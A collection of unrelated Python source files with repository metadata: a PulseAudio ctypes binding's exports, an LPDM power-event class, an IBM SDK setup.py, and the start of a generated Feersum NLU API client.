pa_timeval_age.restype = pa_usec_t
pa_timeval_age.argtypes = [POINTER(struct_timeval)]
# /usr/include/pulse/timeval.h:74
pa_timeval_add = _lib.pa_timeval_add
pa_timeval_add.restype = POINTER(struct_timeval)
pa_timeval_add.argtypes = [POINTER(struct_timeval), pa_usec_t]
# /usr/include/pulse/timeval.h:77
pa_timeval_sub = _lib.pa_timeval_sub
pa_timeval_sub.restype = POINTER(struct_timeval)
pa_timeval_sub.argtypes = [POINTER(struct_timeval), pa_usec_t]
# /usr/include/pulse/timeval.h:80
pa_timeval_store = _lib.pa_timeval_store
pa_timeval_store.restype = POINTER(struct_timeval)
pa_timeval_store.argtypes = [POINTER(struct_timeval), pa_usec_t]
# /usr/include/pulse/timeval.h:83
pa_timeval_load = _lib.pa_timeval_load
pa_timeval_load.restype = pa_usec_t
pa_timeval_load.argtypes = [POINTER(struct_timeval)]
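# Illustrative sketch: a wall-clock timestamp in microseconds, using the
# struct_timeval type declared earlier in this module.
def _example_now_usec():
    tv = struct_timeval()
    pa_gettimeofday(byref(tv))
    return pa_timeval_load(byref(tv))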
__all__ = ['pa_get_library_version', 'PA_API_VERSION', 'PA_PROTOCOL_VERSION',
'PA_MAJOR', 'PA_MINOR', 'PA_MICRO', 'PA_CHANNELS_MAX', 'PA_RATE_MAX',
'pa_sample_format_t', 'PA_SAMPLE_U8', 'PA_SAMPLE_ALAW', 'PA_SAMPLE_ULAW',
'PA_SAMPLE_S16LE', 'PA_SAMPLE_S16BE', 'PA_SAMPLE_FLOAT32LE',
'PA_SAMPLE_FLOAT32BE', 'PA_SAMPLE_S32LE', 'PA_SAMPLE_S32BE',
'PA_SAMPLE_S24LE', 'PA_SAMPLE_S24BE', 'PA_SAMPLE_S24_32LE',
'PA_SAMPLE_S24_32BE', 'PA_SAMPLE_MAX', 'PA_SAMPLE_INVALID', 'pa_sample_spec',
'pa_usec_t', 'pa_bytes_per_second', 'pa_frame_size', 'pa_sample_size',
'pa_sample_size_of_format', 'pa_bytes_to_usec', 'pa_usec_to_bytes',
'pa_sample_spec_init', 'pa_sample_format_valid', 'pa_sample_rate_valid',
'pa_channels_valid', 'pa_sample_spec_valid', 'pa_sample_spec_equal',
'pa_sample_format_to_string', 'pa_parse_sample_format',
'PA_SAMPLE_SPEC_SNPRINT_MAX', 'pa_sample_spec_snprint',
'PA_BYTES_SNPRINT_MAX', 'pa_bytes_snprint', 'pa_sample_format_is_le',
'pa_sample_format_is_be', 'pa_context_state_t', 'PA_CONTEXT_UNCONNECTED',
'PA_CONTEXT_CONNECTING', 'PA_CONTEXT_AUTHORIZING', 'PA_CONTEXT_SETTING_NAME',
'PA_CONTEXT_READY', 'PA_CONTEXT_FAILED', 'PA_CONTEXT_TERMINATED',
'pa_stream_state_t', 'PA_STREAM_UNCONNECTED', 'PA_STREAM_CREATING',
'PA_STREAM_READY', 'PA_STREAM_FAILED', 'PA_STREAM_TERMINATED',
'pa_operation_state_t', 'PA_OPERATION_RUNNING', 'PA_OPERATION_DONE',
'PA_OPERATION_CANCELLED', 'pa_context_flags_t', 'PA_CONTEXT_NOFLAGS',
'PA_CONTEXT_NOAUTOSPAWN', 'PA_CONTEXT_NOFAIL', 'pa_direction_t',
'PA_DIRECTION_OUTPUT', 'PA_DIRECTION_INPUT', 'pa_device_type_t',
'PA_DEVICE_TYPE_SINK', 'PA_DEVICE_TYPE_SOURCE', 'pa_stream_direction_t',
'PA_STREAM_NODIRECTION', 'PA_STREAM_PLAYBACK', 'PA_STREAM_RECORD',
'PA_STREAM_UPLOAD', 'pa_stream_flags_t', 'PA_STREAM_NOFLAGS',
'PA_STREAM_START_CORKED', 'PA_STREAM_INTERPOLATE_TIMING',
'PA_STREAM_NOT_MONOTONIC', 'PA_STREAM_AUTO_TIMING_UPDATE',
'PA_STREAM_NO_REMAP_CHANNELS', 'PA_STREAM_NO_REMIX_CHANNELS',
'PA_STREAM_FIX_FORMAT', 'PA_STREAM_FIX_RATE', 'PA_STREAM_FIX_CHANNELS',
'PA_STREAM_DONT_MOVE', 'PA_STREAM_VARIABLE_RATE', 'PA_STREAM_PEAK_DETECT',
'PA_STREAM_START_MUTED', 'PA_STREAM_ADJUST_LATENCY',
'PA_STREAM_EARLY_REQUESTS', 'PA_STREAM_DONT_INHIBIT_AUTO_SUSPEND',
'PA_STREAM_START_UNMUTED', 'PA_STREAM_FAIL_ON_SUSPEND',
'PA_STREAM_RELATIVE_VOLUME', 'PA_STREAM_PASSTHROUGH', 'pa_buffer_attr',
'pa_error_code_t', 'PA_OK', 'PA_ERR_ACCESS', 'PA_ERR_COMMAND',
'PA_ERR_INVALID', 'PA_ERR_EXIST', 'PA_ERR_NOENTITY',
'PA_ERR_CONNECTIONREFUSED', 'PA_ERR_PROTOCOL', 'PA_ERR_TIMEOUT',
'PA_ERR_AUTHKEY', 'PA_ERR_INTERNAL', 'PA_ERR_CONNECTIONTERMINATED',
'PA_ERR_KILLED', 'PA_ERR_INVALIDSERVER', 'PA_ERR_MODINITFAILED',
'PA_ERR_BADSTATE', 'PA_ERR_NODATA', 'PA_ERR_VERSION', 'PA_ERR_TOOLARGE',
'PA_ERR_NOTSUPPORTED', 'PA_ERR_UNKNOWN', 'PA_ERR_NOEXTENSION',
'PA_ERR_OBSOLETE', 'PA_ERR_NOTIMPLEMENTED', 'PA_ERR_FORKED', 'PA_ERR_IO',
'PA_ERR_BUSY', 'PA_ERR_MAX', 'pa_subscription_mask_t',
'PA_SUBSCRIPTION_MASK_NULL', 'PA_SUBSCRIPTION_MASK_SINK',
'PA_SUBSCRIPTION_MASK_SOURCE', 'PA_SUBSCRIPTION_MASK_SINK_INPUT',
'PA_SUBSCRIPTION_MASK_SOURCE_OUTPUT', 'PA_SUBSCRIPTION_MASK_MODULE',
'PA_SUBSCRIPTION_MASK_CLIENT', 'PA_SUBSCRIPTION_MASK_SAMPLE_CACHE',
'PA_SUBSCRIPTION_MASK_SERVER', 'PA_SUBSCRIPTION_MASK_AUTOLOAD',
'PA_SUBSCRIPTION_MASK_CARD', 'PA_SUBSCRIPTION_MASK_ALL',
'pa_subscription_event_type_t', 'PA_SUBSCRIPTION_EVENT_SINK',
'PA_SUBSCRIPTION_EVENT_SOURCE', 'PA_SUBSCRIPTION_EVENT_SINK_INPUT',
'PA_SUBSCRIPTION_EVENT_SOURCE_OUTPUT', 'PA_SUBSCRIPTION_EVENT_MODULE',
'PA_SUBSCRIPTION_EVENT_CLIENT', 'PA_SUBSCRIPTION_EVENT_SAMPLE_CACHE',
'PA_SUBSCRIPTION_EVENT_SERVER', 'PA_SUBSCRIPTION_EVENT_AUTOLOAD',
'PA_SUBSCRIPTION_EVENT_CARD', 'PA_SUBSCRIPTION_EVENT_FACILITY_MASK',
'PA_SUBSCRIPTION_EVENT_NEW', 'PA_SUBSCRIPTION_EVENT_CHANGE',
'PA_SUBSCRIPTION_EVENT_REMOVE', 'PA_SUBSCRIPTION_EVENT_TYPE_MASK',
'pa_timing_info', 'pa_spawn_api', 'pa_seek_mode_t', 'PA_SEEK_RELATIVE',
'PA_SEEK_ABSOLUTE', 'PA_SEEK_RELATIVE_ON_READ', 'PA_SEEK_RELATIVE_END',
'pa_sink_flags_t', 'PA_SINK_NOFLAGS', 'PA_SINK_HW_VOLUME_CTRL',
'PA_SINK_LATENCY', 'PA_SINK_HARDWARE', 'PA_SINK_NETWORK',
'PA_SINK_HW_MUTE_CTRL', 'PA_SINK_DECIBEL_VOLUME', 'PA_SINK_FLAT_VOLUME',
'PA_SINK_DYNAMIC_LATENCY', 'PA_SINK_SET_FORMATS', 'pa_sink_state_t',
'PA_SINK_INVALID_STATE', 'PA_SINK_RUNNING', 'PA_SINK_IDLE',
'PA_SINK_SUSPENDED', 'PA_SINK_INIT', 'PA_SINK_UNLINKED', 'pa_source_flags_t',
'PA_SOURCE_NOFLAGS', 'PA_SOURCE_HW_VOLUME_CTRL', 'PA_SOURCE_LATENCY',
'PA_SOURCE_HARDWARE', 'PA_SOURCE_NETWORK', 'PA_SOURCE_HW_MUTE_CTRL',
'PA_SOURCE_DECIBEL_VOLUME', 'PA_SOURCE_DYNAMIC_LATENCY',
'PA_SOURCE_FLAT_VOLUME', 'pa_source_state_t', 'PA_SOURCE_INVALID_STATE',
'PA_SOURCE_RUNNING', 'PA_SOURCE_IDLE', 'PA_SOURCE_SUSPENDED',
'PA_SOURCE_INIT', 'PA_SOURCE_UNLINKED', 'pa_free_cb_t', 'pa_port_available_t',
'PA_PORT_AVAILABLE_UNKNOWN', 'PA_PORT_AVAILABLE_NO', 'PA_PORT_AVAILABLE_YES',
'pa_mainloop_api', 'pa_io_event_flags_t', 'PA_IO_EVENT_NULL',
'PA_IO_EVENT_INPUT', 'PA_IO_EVENT_OUTPUT', 'PA_IO_EVENT_HANGUP',
'PA_IO_EVENT_ERROR', 'pa_io_event', 'pa_io_event_cb_t',
'pa_io_event_destroy_cb_t', 'pa_time_event', 'pa_time_event_cb_t',
'pa_time_event_destroy_cb_t', 'pa_defer_event', 'pa_defer_event_cb_t',
'pa_defer_event_destroy_cb_t', 'pa_mainloop_api_once',
'pa_channel_position_t', 'PA_CHANNEL_POSITION_INVALID',
'PA_CHANNEL_POSITION_MONO', 'PA_CHANNEL_POSITION_FRONT_LEFT',
'PA_CHANNEL_POSITION_FRONT_RIGHT', 'PA_CHANNEL_POSITION_FRONT_CENTER',
'PA_CHANNEL_POSITION_LEFT', 'PA_CHANNEL_POSITION_RIGHT',
'PA_CHANNEL_POSITION_CENTER', 'PA_CHANNEL_POSITION_REAR_CENTER',
'PA_CHANNEL_POSITION_REAR_LEFT', 'PA_CHANNEL_POSITION_REAR_RIGHT',
'PA_CHANNEL_POSITION_LFE', 'PA_CHANNEL_POSITION_SUBWOOFER',
'PA_CHANNEL_POSITION_FRONT_LEFT_OF_CENTER',
'PA_CHANNEL_POSITION_FRONT_RIGHT_OF_CENTER', 'PA_CHANNEL_POSITION_SIDE_LEFT',
'PA_CHANNEL_POSITION_SIDE_RIGHT', 'PA_CHANNEL_POSITION_AUX0',
'PA_CHANNEL_POSITION_AUX1', 'PA_CHANNEL_POSITION_AUX2',
'PA_CHANNEL_POSITION_AUX3', 'PA_CHANNEL_POSITION_AUX4',
'PA_CHANNEL_POSITION_AUX5', 'PA_CHANNEL_POSITION_AUX6',
'PA_CHANNEL_POSITION_AUX7', 'PA_CHANNEL_POSITION_AUX8',
'PA_CHANNEL_POSITION_AUX9', 'PA_CHANNEL_POSITION_AUX10',
'PA_CHANNEL_POSITION_AUX11', 'PA_CHANNEL_POSITION_AUX12',
'PA_CHANNEL_POSITION_AUX13', 'PA_CHANNEL_POSITION_AUX14',
'PA_CHANNEL_POSITION_AUX15', 'PA_CHANNEL_POSITION_AUX16',
'PA_CHANNEL_POSITION_AUX17', 'PA_CHANNEL_POSITION_AUX18',
'PA_CHANNEL_POSITION_AUX19', 'PA_CHANNEL_POSITION_AUX20',
'PA_CHANNEL_POSITION_AUX21', 'PA_CHANNEL_POSITION_AUX22',
'PA_CHANNEL_POSITION_AUX23', 'PA_CHANNEL_POSITION_AUX24',
'PA_CHANNEL_POSITION_AUX25', 'PA_CHANNEL_POSITION_AUX26',
'PA_CHANNEL_POSITION_AUX27', 'PA_CHANNEL_POSITION_AUX28',
'PA_CHANNEL_POSITION_AUX29', 'PA_CHANNEL_POSITION_AUX30',
'PA_CHANNEL_POSITION_AUX31', 'PA_CHANNEL_POSITION_TOP_CENTER',
'PA_CHANNEL_POSITION_TOP_FRONT_LEFT', 'PA_CHANNEL_POSITION_TOP_FRONT_RIGHT',
'PA_CHANNEL_POSITION_TOP_FRONT_CENTER', 'PA_CHANNEL_POSITION_TOP_REAR_LEFT',
'PA_CHANNEL_POSITION_TOP_REAR_RIGHT', 'PA_CHANNEL_POSITION_TOP_REAR_CENTER',
'PA_CHANNEL_POSITION_MAX', 'pa_channel_position_mask_t',
'pa_channel_map_def_t', 'PA_CHANNEL_MAP_AIFF', 'PA_CHANNEL_MAP_ALSA',
'PA_CHANNEL_MAP_AUX', 'PA_CHANNEL_MAP_WAVEEX', 'PA_CHANNEL_MAP_OSS',
'PA_CHANNEL_MAP_DEF_MAX', 'PA_CHANNEL_MAP_DEFAULT', 'pa_channel_map',
'pa_channel_map_init', 'pa_channel_map_init_mono',
'pa_channel_map_init_stereo', 'pa_channel_map_init_auto',
'pa_channel_map_init_extend', 'pa_channel_position_to_string',
'pa_channel_position_from_string', 'pa_channel_position_to_pretty_string',
'PA_CHANNEL_MAP_SNPRINT_MAX', 'pa_channel_map_snprint',
'pa_channel_map_parse', 'pa_channel_map_equal', 'pa_channel_map_valid',
'pa_channel_map_compatible', 'pa_channel_map_superset',
'pa_channel_map_can_balance', 'pa_channel_map_can_fade',
'pa_channel_map_to_name', 'pa_channel_map_to_pretty_name',
'pa_channel_map_has_position', 'pa_channel_map_mask', 'pa_operation',
'pa_operation_notify_cb_t', 'pa_operation_ref', 'pa_operation_unref',
'pa_operation_cancel', 'pa_operation_get_state',
'pa_operation_set_state_callback', 'pa_context', 'pa_context_notify_cb_t',
'pa_context_success_cb_t', 'pa_context_event_cb_t', 'pa_context_new',
'pa_context_new_with_proplist', 'pa_context_unref', 'pa_context_ref',
'pa_context_set_state_callback', 'pa_context_set_event_callback',
'pa_context_errno', 'pa_context_is_pending', 'pa_context_get_state',
'pa_context_connect', 'pa_context_disconnect', 'pa_context_drain',
'pa_context_exit_daemon', 'pa_context_set_default_sink',
'pa_context_set_default_source', 'pa_context_is_local', 'pa_context_set_name',
'pa_context_get_server', 'pa_context_get_protocol_version',
'pa_context_get_server_protocol_version', 'PA_UPDATE_SET', 'PA_UPDATE_MERGE',
'PA_UPDATE_REPLACE', 'pa_context_proplist_update',
'pa_context_proplist_remove', 'pa_context_get_index', 'pa_context_rttime_new',
'pa_context_rttime_restart', 'pa_context_get_tile_size',
'pa_context_load_cookie_from_file', 'pa_volume_t', 'pa_cvolume',
'pa_cvolume_equal', 'pa_cvolume_init', 'pa_cvolume_set',
'PA_CVOLUME_SNPRINT_MAX', 'pa_cvolume_snprint',
'PA_SW_CVOLUME_SNPRINT_DB_MAX', 'pa_sw_cvolume_snprint_dB',
'PA_CVOLUME_SNPRINT_VERBOSE_MAX', 'pa_cvolume_snprint_verbose',
'PA_VOLUME_SNPRINT_MAX', 'pa_volume_snprint', 'PA_SW_VOLUME_SNPRINT_DB_MAX',
'pa_sw_volume_snprint_dB', 'PA_VOLUME_SNPRINT_VERBOSE_MAX',
'pa_volume_snprint_verbose', 'pa_cvolume_avg', 'pa_cvolume_avg_mask',
'pa_cvolume_max', 'pa_cvolume_max_mask', 'pa_cvolume_min',
'pa_cvolume_min_mask', 'pa_cvolume_valid', 'pa_cvolume_channels_equal_to',
'pa_sw_volume_multiply', 'pa_sw_cvolume_multiply',
'pa_sw_cvolume_multiply_scalar', 'pa_sw_volume_divide',
'pa_sw_cvolume_divide', 'pa_sw_cvolume_divide_scalar', 'pa_sw_volume_from_dB',
'pa_sw_volume_to_dB', 'pa_sw_volume_from_linear', 'pa_sw_volume_to_linear',
'pa_cvolume_remap', 'pa_cvolume_compatible',
'pa_cvolume_compatible_with_channel_map', 'pa_cvolume_get_balance',
'pa_cvolume_set_balance', 'pa_cvolume_get_fade', 'pa_cvolume_set_fade',
'pa_cvolume_scale', 'pa_cvolume_scale_mask', 'pa_cvolume_set_position',
'pa_cvolume_get_position', 'pa_cvolume_merge', 'pa_cvolume_inc_clamp',
'pa_cvolume_inc', 'pa_cvolume_dec', 'pa_stream', 'pa_stream_success_cb_t',
'pa_stream_request_cb_t', 'pa_stream_notify_cb_t', 'pa_stream_event_cb_t',
'pa_stream_new', 'pa_stream_new_with_proplist', 'PA_ENCODING_ANY',
'PA_ENCODING_PCM', 'PA_ENCODING_AC3_IEC61937', 'PA_ENCODING_EAC3_IEC61937',
'PA_ENCODING_MPEG_IEC61937', 'PA_ENCODING_DTS_IEC61937',
'PA_ENCODING_MPEG2_AAC_IEC61937', 'PA_ENCODING_MAX', 'PA_ENCODING_INVALID',
'pa_stream_new_extended', 'pa_stream_unref', 'pa_stream_ref',
'pa_stream_get_state', 'pa_stream_get_context', 'pa_stream_get_index',
'pa_stream_get_device_index', 'pa_stream_get_device_name',
'pa_stream_is_suspended', 'pa_stream_is_corked', 'pa_stream_connect_playback',
'pa_stream_connect_record', 'pa_stream_disconnect', 'pa_stream_begin_write',
'pa_stream_cancel_write', 'pa_stream_write', 'pa_stream_write_ext_free',
'pa_stream_peek', 'pa_stream_drop', 'pa_stream_writable_size',
'pa_stream_readable_size', 'pa_stream_drain', 'pa_stream_update_timing_info',
'pa_stream_set_state_callback', 'pa_stream_set_write_callback',
'pa_stream_set_read_callback', 'pa_stream_set_overflow_callback',
'pa_stream_get_underflow_index', 'pa_stream_set_underflow_callback',
'pa_stream_set_started_callback', 'pa_stream_set_latency_update_callback',
'pa_stream_set_moved_callback', 'pa_stream_set_suspended_callback',
'pa_stream_set_event_callback', 'pa_stream_set_buffer_attr_callback',
'pa_stream_cork', 'pa_stream_flush', 'pa_stream_prebuf', 'pa_stream_trigger',
'pa_stream_set_name', 'pa_stream_get_time', 'pa_stream_get_latency',
'pa_stream_get_timing_info', 'pa_stream_get_sample_spec',
'pa_stream_get_channel_map', 'pa_stream_get_format_info',
'pa_stream_get_buffer_attr', 'pa_stream_set_buffer_attr',
'pa_stream_update_sample_rate', 'pa_stream_proplist_update',
'pa_stream_proplist_remove', 'pa_stream_set_monitor_stream',
'pa_stream_get_monitor_stream', 'pa_sink_port_info', 'pa_sink_info',
'pa_sink_info_cb_t', 'pa_context_get_sink_info_by_name',
'pa_context_get_sink_info_by_index', 'pa_context_get_sink_info_list',
'pa_context_set_sink_volume_by_index', 'pa_context_set_sink_volume_by_name',
'pa_context_set_sink_mute_by_index', 'pa_context_set_sink_mute_by_name',
'pa_context_suspend_sink_by_name', 'pa_context_suspend_sink_by_index',
'pa_context_set_sink_port_by_index', 'pa_context_set_sink_port_by_name',
'pa_source_port_info', 'pa_source_info', 'pa_source_info_cb_t',
'pa_context_get_source_info_by_name', 'pa_context_get_source_info_by_index',
'pa_context_get_source_info_list', 'pa_context_set_source_volume_by_index',
'pa_context_set_source_volume_by_name', 'pa_context_set_source_mute_by_index',
'pa_context_set_source_mute_by_name', 'pa_context_suspend_source_by_name',
'pa_context_suspend_source_by_index', 'pa_context_set_source_port_by_index',
'pa_context_set_source_port_by_name', 'pa_server_info', 'pa_server_info_cb_t',
'pa_context_get_server_info', 'pa_module_info', 'pa_module_info_cb_t',
'pa_context_get_module_info', 'pa_context_get_module_info_list',
'pa_context_index_cb_t', 'pa_context_load_module', 'pa_context_unload_module',
'pa_client_info', 'pa_client_info_cb_t', 'pa_context_get_client_info',
'pa_context_get_client_info_list', 'pa_context_kill_client',
'pa_card_profile_info', 'pa_card_profile_info2', 'pa_card_port_info',
'pa_card_info', 'pa_card_info_cb_t', 'pa_context_get_card_info_by_index',
'pa_context_get_card_info_by_name', 'pa_context_get_card_info_list',
'pa_context_set_card_profile_by_index', 'pa_context_set_card_profile_by_name',
'pa_context_set_port_latency_offset', 'pa_sink_input_info',
'pa_sink_input_info_cb_t', 'pa_context_get_sink_input_info',
'pa_context_get_sink_input_info_list', 'pa_context_move_sink_input_by_name',
'pa_context_move_sink_input_by_index', 'pa_context_set_sink_input_volume',
'pa_context_set_sink_input_mute', 'pa_context_kill_sink_input',
'pa_source_output_info', 'pa_source_output_info_cb_t',
'pa_context_get_source_output_info', 'pa_context_get_source_output_info_list',
'pa_context_move_source_output_by_name',
'pa_context_move_source_output_by_index',
'pa_context_set_source_output_volume', 'pa_context_set_source_output_mute',
'pa_context_kill_source_output', 'pa_stat_info', 'pa_stat_info_cb_t',
'pa_context_stat', 'pa_sample_info', 'pa_sample_info_cb_t',
'pa_context_get_sample_info_by_name', 'pa_context_get_sample_info_by_index',
'pa_context_get_sample_info_list', 'pa_autoload_type_t', 'PA_AUTOLOAD_SINK',
'PA_AUTOLOAD_SOURCE', 'pa_autoload_info', 'pa_autoload_info_cb_t',
'pa_context_get_autoload_info_by_name',
'pa_context_get_autoload_info_by_index', 'pa_context_get_autoload_info_list',
'pa_context_add_autoload', 'pa_context_remove_autoload_by_name',
'pa_context_remove_autoload_by_index', 'pa_context_subscribe_cb_t',
'pa_context_subscribe', 'pa_context_set_subscribe_callback',
'pa_context_play_sample_cb_t', 'pa_stream_connect_upload',
'pa_stream_finish_upload', 'pa_context_remove_sample',
'pa_context_play_sample', 'pa_context_play_sample_with_proplist',
'pa_strerror', 'pa_xmalloc', 'pa_xmalloc0', 'pa_xrealloc', 'pa_xfree',
'pa_xstrdup', 'pa_xstrndup', 'pa_xmemdup', '_pa_xnew_internal',
'_pa_xnew0_internal', '_pa_xnewdup_internal', '_pa_xrenew_internal',
'pa_utf8_valid', 'pa_ascii_valid', 'pa_utf8_filter', 'pa_ascii_filter',
'pa_utf8_to_locale', 'pa_locale_to_utf8', 'pa_threaded_mainloop',
'pa_threaded_mainloop_new', 'pa_threaded_mainloop_free',
'pa_threaded_mainloop_start', 'pa_threaded_mainloop_stop',
'pa_threaded_mainloop_lock', 'pa_threaded_mainloop_unlock',
'pa_threaded_mainloop_wait', 'pa_threaded_mainloop_signal',
'pa_threaded_mainloop_accept', 'pa_threaded_mainloop_get_retval',
'pa_threaded_mainloop_get_api', 'pa_threaded_mainloop_in_thread',
'pa_threaded_mainloop_set_name', 'pa_mainloop', 'pa_mainloop_new',
'pa_mainloop_free', 'pa_mainloop_prepare', 'pa_mainloop_poll',
'pa_mainloop_dispatch', 'pa_mainloop_get_retval', 'pa_mainloop_iterate',
'pa_mainloop_run', 'pa_mainloop_get_api', 'pa_mainloop_quit',
'pa_mainloop_wakeup', 'pa_poll_func', 'pa_mainloop_set_poll_func',
'pa_signal_event', 'pa_signal_cb_t', 'pa_signal_destroy_cb_t',
'pa_signal_init', 'pa_signal_done', 'pa_signal_new', 'pa_signal_free',
'pa_signal_set_destroy', 'pa_get_user_name', 'pa_get_host_name',
'pa_get_fqdn', 'pa_get_home_dir', 'pa_get_binary_name',
'pa_path_get_filename', 'pa_msleep', 'pa_gettimeofday', 'pa_timeval_diff',
'pa_timeval_cmp', 'pa_timeval_age', 'pa_timeval_add', 'pa_timeval_sub',
'pa_timeval_store', 'pa_timeval_load']
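# Editor's note (illustrative, not part of the original binding): because
# __all__ is defined as above, a wildcard import of this PulseAudio ctypes
# module exposes exactly these pa_* names and constants, e.g.:
#
#     from <this_module> import *   # module path elided; see file header
#     m = pa_mainloop_new()          # names listed above become directly visible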
| 41.041276
| 168
| 0.806443
|
42146d9733d358ed91ccc5d2d78182e86e54b005
| 379
|
py
|
Python
|
simulation/lpdm_event/lpdm_buy_power_event.py
|
LBNL-ETA/LPDM
|
3384a784b97e49cd7a801b758717a7107a51119f
|
[
"BSD-3-Clause-LBNL"
] | 2
|
2019-01-05T02:33:38.000Z
|
2020-04-22T16:57:50.000Z
|
simulation/lpdm_event/lpdm_buy_power_event.py
|
LBNL-ETA/LPDM
|
3384a784b97e49cd7a801b758717a7107a51119f
|
[
"BSD-3-Clause-LBNL"
] | 3
|
2019-04-17T18:13:08.000Z
|
2021-04-23T22:40:23.000Z
|
simulation/lpdm_event/lpdm_buy_power_event.py
|
LBNL-ETA/LPDM
|
3384a784b97e49cd7a801b758717a7107a51119f
|
[
"BSD-3-Clause-LBNL"
] | 1
|
2019-01-31T08:37:44.000Z
|
2019-01-31T08:37:44.000Z
|
from lpdm_base_event import LpdmBaseEvent


class LpdmBuyPowerEvent(LpdmBaseEvent):
    """A grid controller notifies a power source how much power is available for purchase"""

    def __init__(self, source_device_id, target_device_id, time, value):
        LpdmBaseEvent.__init__(self, source_device_id, target_device_id, time, value)
        self.event_type = "buy_max_power"
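# Illustrative usage sketch (editor's addition, not part of the original
# file): a grid controller offering 1200 W to a power source. The device ids,
# timestamp and wattage below are hypothetical, assuming LpdmBaseEvent simply
# stores the four constructor arguments unchanged.
if __name__ == "__main__":
    event = LpdmBuyPowerEvent("grid_controller_1", "pv_array_1", 3600, 1200.0)
    print(event.event_type)  # -> "buy_max_power"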
| 37.9
| 92
| 0.76781
|
f8669fc7d941027ed059d4d777c769383a681029
| 2,671
|
py
|
Python
|
setup.py
|
IBM/data-virtualization-on-cloud-python-sdk
|
9d0917854b1f0728f75e5f96141729ee37a40126
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
IBM/data-virtualization-on-cloud-python-sdk
|
9d0917854b1f0728f75e5f96141729ee37a40126
|
[
"Apache-2.0"
] | 9
|
2021-06-23T09:28:53.000Z
|
2021-11-09T02:04:56.000Z
|
setup.py
|
IBM/data-virtualization-on-cloud-python-sdk
|
9d0917854b1f0728f75e5f96141729ee37a40126
|
[
"Apache-2.0"
] | 3
|
2021-06-18T14:03:06.000Z
|
2021-06-22T07:00:23.000Z
|
#!/usr/bin/env python
# Copyright 2019, 2020 IBM All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup
from setuptools.command.test import test as TestCommand

import os
import sys

import pkg_resources

__version__ = '0.1.0'

PACKAGE_NAME = 'ibm_data_virtualization_on_cloud'
PACKAGE_DESC = 'The IBM Data Virtualization on Cloud Python SDK'

with open('requirements.txt') as f:
    install_requires = [
        str(req) for req in pkg_resources.parse_requirements(f)
    ]

with open('requirements-dev.txt') as f:
    tests_require = [str(req) for req in pkg_resources.parse_requirements(f)]

if sys.argv[-1] == 'publish':
    # test server
    os.system('python setup.py register -r pypitest')
    os.system('python setup.py sdist upload -r pypitest')

    # production server
    os.system('python setup.py register -r pypi')
    os.system('python setup.py sdist upload -r pypi')
    sys.exit()

with open("README.md", "r") as fh:
    readme = fh.read()

setup(
name=PACKAGE_NAME.replace('_', '-'),
version=__version__,
description=PACKAGE_DESC,
license='Apache 2.0',
install_requires=install_requires,
tests_require=tests_require,
author='IBM',
author_email='devxsdk@us.ibm.com',
long_description=readme,
long_description_content_type='text/markdown',
url='https://github.com/IBM/data-virtualization-on-cloud-python-sdk',
packages=[PACKAGE_NAME],
include_package_data=True,
keywords=PACKAGE_NAME,
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Libraries :: Application Frameworks',
],
zip_safe=True)
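# Editor's note (illustrative): the commands below sketch how this setup.py is
# typically exercised; the distribution name derives from PACKAGE_NAME with
# underscores replaced by hyphens, and the tarball name assumes version 0.1.0.
#
#     python setup.py sdist
#     pip install dist/ibm-data-virtualization-on-cloud-0.1.0.tar.gz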
| 35.144737
| 79
| 0.693748
|
c0d262e131c4896ffaf2ca30b9323c8bff89bf0b
| 103,639
|
py
|
Python
|
feersum_nlu/api/synonym_entity_extractors_api.py
|
praekelt/feersum-nlu-api-wrappers
|
6580e2bab2c8a764fe868a505330b3fee6029074
|
[
"BSD-3-Clause"
] | 9
|
2017-10-10T12:24:23.000Z
|
2021-08-18T14:07:51.000Z
|
feersum_nlu/api/synonym_entity_extractors_api.py
|
praekelt/feersum-nlu-api-wrappers
|
6580e2bab2c8a764fe868a505330b3fee6029074
|
[
"BSD-3-Clause"
] | 1
|
2020-12-06T11:03:25.000Z
|
2021-04-14T05:21:23.000Z
|
feersum_nlu/api/synonym_entity_extractors_api.py
|
praekelt/feersum-nlu-api-wrappers
|
6580e2bab2c8a764fe868a505330b3fee6029074
|
[
"BSD-3-Clause"
] | 2
|
2019-02-12T08:26:06.000Z
|
2022-02-01T09:39:47.000Z
|
# coding: utf-8

"""
    FeersumNLU API

    This is the HTTP API for Feersum NLU. See https://github.com/praekelt/feersum-nlu-api-wrappers for examples of how to use the API.  # noqa: E501

    OpenAPI spec version: 2.0.54.dev2
    Contact: nlu@feersum.io
    Generated by: https://github.com/swagger-api/swagger-codegen.git
"""

from __future__ import absolute_import

import re  # noqa: F401

# python 2 and python 3 compatibility library
import six

from feersum_nlu.api_client import ApiClient

class SynonymEntityExtractorsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
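    # Editor's sketch of the sync/async calling convention documented in the
    # method docstrings below; the instance name is hypothetical, and the
    # ApiClient is assumed to be configured elsewhere with a valid API key.
    #
    #     api = SynonymEntityExtractorsApi(ApiClient())
    #     labels = api.synonym_entity_extractor_get_labels("my_extractor")
    #     thread = api.synonym_entity_extractor_get_labels(
    #         "my_extractor", async_req=True)
    #     labels = thread.get()   # block until the async result is available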
def synonym_entity_extractor_add_testing_samples(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Add testing samples. # noqa: E501
        Add testing samples to the named extractor. Returns the samples added to the instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_add_testing_samples(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
